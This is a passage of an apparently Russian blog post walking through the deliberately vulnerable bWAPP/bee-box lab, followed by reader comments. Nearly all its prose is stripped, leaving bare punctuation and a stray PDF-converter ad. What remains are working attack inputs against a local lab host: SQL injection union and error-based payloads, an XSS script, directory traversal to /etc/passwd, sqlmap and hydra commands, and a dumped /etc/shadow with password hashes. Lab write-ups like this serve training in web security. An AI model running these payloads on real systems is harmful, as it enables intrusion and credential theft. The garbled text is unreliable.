

@Mach1ne


14 2015 15:35

- OWASP Top-10
bWAPP

- *, *

, !
- ( ), OWASP Top-10,
bWAPP.

:
Open Web Application Security Project (OWASP) -. OWASP
, . , , ,
, . -10
-, -.
-10 :

open in browser PRO version

Are you a developer? Try out the HTML to PDF API

pdfcrowd.com


A1
A2
A3 (XSS)
A4
A5
A6
A7
A8 (CSRF)
A9
A10
, .
buggy web application (bWAPP) -, . , 100
, -10 OWASP. - .
bWAPP Malik Mesellem ( )


PHP , MYSQL. /, WAMP XAMPP.


bee-box, .
, bWAPP:

:
, , .
bwapp , .

:
, - ( :)), , ,
-.

:

, bWAPP.
, .

:
/ . -.


:)

WARNING!
:
1. - .
2. , .
/ .
// .

SQL-injection
SQL Injection (GET/Search)
, . , Hulk.


, :
http://192.168.1.18/bWAPP/sqli_1.php?title=hulk&action=search

order by :
http://192.168.1.18/bWAPP/sqli_1.php?title=hulk%27%20order%20by%2010%20--%20&action=search

7:
http://192.168.1.18/bWAPP/sqli_1.php?title=hulk%27%20order%20by%207%20--%20&action=search

union:


http://192.168.1.18/bWAPP/sqli_1.php?title=hulk%27%20union%20select%201,2,3,4,5,6,7%20from%20users%20--%20&action=search

, , :
http://192.168.1.18/bWAPP/sqli_1.php?title=hulk%27%20union%20select%201,database%28%29,user%28%29,4,password,6,7%20from%20users%20--%20&action=search

SQL Injection (POST/Search)


/bWAPP/sqli_6.php, Hulk', , ? Burpsuite Sqlmap:
burpsuite


, , Request .txt .
sqlmap :
sqlmap -r sql.txt


sqlmap , , , , :
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: title=hulk%' AND (SELECT 2135 FROM(SELECT COUNT(*),CONCAT(0x7178766a71,(SELECT (CASE WHEN (2135=2135) THEN 1 ELSE 0 END)),0x7162767071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='&action=search

payload :
http://192.168.1.18/bWAPP/sqli_1.php?title=hulk%' AND (SELECT 2135 FROM(SELECT COUNT(*),CONCAT(0x7178766a71,(SELECT (CASE WHEN (2135=2135) THEN 1 ELSE 0 END)),0x7162767071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='&action=search

, , :

XSS?
.
XSS Reflected (GET)

<script>alert(1);</script>


Directory Traversal Files


http://192.168.1.18/bWAPP/directory_traversal_1.php?page=message.txt

/etc/passwd:


Directory Traversal Directories


http://192.168.1.18/bWAPP/directory_traversal_2.php?directory=documents

/etc/:



boot2root ( bWAPP) ,
.
nmap':

Nmap scan report for bee-box (192.168.1.18)
Host is up (0.0050s latency).
Not shown: 983 closed ports
PORT     STATE SERVICE
21/tcp   open  ftp
22/tcp   open  ssh
25/tcp   open  smtp
80/tcp   open  http
139/tcp  open  netbios-ssn
443/tcp  open  https
445/tcp  open  microsoft-ds
512/tcp  open  exec
513/tcp  open  login
514/tcp  open  shell
666/tcp  open  doom
3306/tcp open  mysql
5901/tcp open  vnc-1
6001/tcp open  X11:1
8080/tcp open  http-proxy
8443/tcp open  https-alt
9080/tcp open  glrpc

Nikto ( ), - , FTP VNC .

FTP
Dirbuster:

Dir found: /phpmyadmin/ - 200
Dir found: /evil/ - 200
Dir found: /webdav/ - 200
File found: /webdav/Iron_Man.pdf - 200
File found: /webdav/Terminator_Salvation.pdf - 200
File found: /webdav/The_Amazing_Spider-Man.pdf - 200
File found: /webdav/The_Cabin_in_the_Woods.pdf - 200
File found: /webdav/The_Dark_Knight_Rises.pdf - 200
File found: /webdav/The_Incredible_Hulk.pdf - 200
File found: /webdav/bWAPP_intro.pdf - 200


nmap --script=ftp*

, :

PORT   STATE SERVICE VERSION
21/tcp open  ftp     ProFTPD 1.3.1
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw-rw-r--   1 root     www-data   543803 Nov  2 22:52 Iron_Man.pdf
| -rw-rw-r--   1 root     www-data   462949 Nov  2 22:52 Terminator_Salvation.pdf
| -rw-rw-r--   1 root     www-data   544600 Nov  2 22:52 The_Amazing_Spider-Man.pdf
| -rw-rw-r--   1 root     www-data   526187 Nov  2 22:52 The_Cabin_in_the_Woods.pdf
| -rw-rw-r--   1 root     www-data   756522 Nov  2 22:52 The_Dark_Knight_Rises.pdf
| -rw-rw-r--   1 root     www-data   618117 Nov  2 22:52 The_Incredible_Hulk.pdf
|_-rw-rw-r--   1 root     www-data  5010042 Nov  2 22:52 bWAPP_intro.pdf

2 , , ftp ( /webdav/) http.


php .

, , ftp http, ? :)


VNC

192.168.1.18:5901

, hydra:

hydra -P /wordlist/pass.txt -s 5901 192.168.1.18 vnc

! , root'.


root, /etc/shadow

root:$1$6.aigTP1$FC1TuoITEYSQwRV0hi6gj/:15792:0:99999:7:::
bee:$1$tJB0ndAJ$0d42BkRQ7vebj/bE5RdQH1:15792:0:99999:7:::
neo:$1$fSorv0ad$56lfF9qd8o4caaSB6dVqi/:15897:0:99999:7:::
alice:$1$yRUOVrYB$9f4TMaym/xOSeGbmsgFGI/:15897:0:99999:7:::
thor:$1$Iy6Mvuaz$FzcNXTQ668kDD5LY.ObdL/:15897:0:99999:7:::
wolverine:$1$PUGlrXi8$oXOwDBaAzxtgXh10Xkw9i/:15897:0:99999:7:::
johnny:$1$uqzKnduQ$MPxhWXcf2FFQarhO95d5y/:15897:0:99999:7:::
selene:$1$BHZLob3h$mru35IhZzRdnfTHOADrkJ0:15897:0:99999:7:::

hashcat' :

Bee-box write-up' boot2root . -, //


.
, , , :
, , Heartbleed? ! 2 .
/ - , , , .
, -, .


bWAPP Malik Mesellem ( )
-10 OWASP
@BeLove
, @BeLove
g0tmi1k , boot2root
, 5
. .

OWASP, bee-box, pentest,




Audiophile 14 2015 16:18

- havij 1.17 . . SQL .


, .

Mach1ne 14 2015 16:29

, , .

outofspace 14 2015 23:04

, , Beast/crime/breach?
, , , bwapp' , , .
pentesterlab

Mach1ne 15 2015 03:14

bWAPP'a, 2 , ( ) cheatsheet', .
.
. , 40 , - ,
.

BeLove 15 2015 21:29

xss - / - (.. ).
CTF (cutycapt ).
, (ruby/java/python). php :)

Mach1ne 17 2015 21:05


bWAPP. :)


LukaSafonov 29 2016 00:37

OWASP .

Mach1ne 11 2016 14:25


, , . , , .

. , .
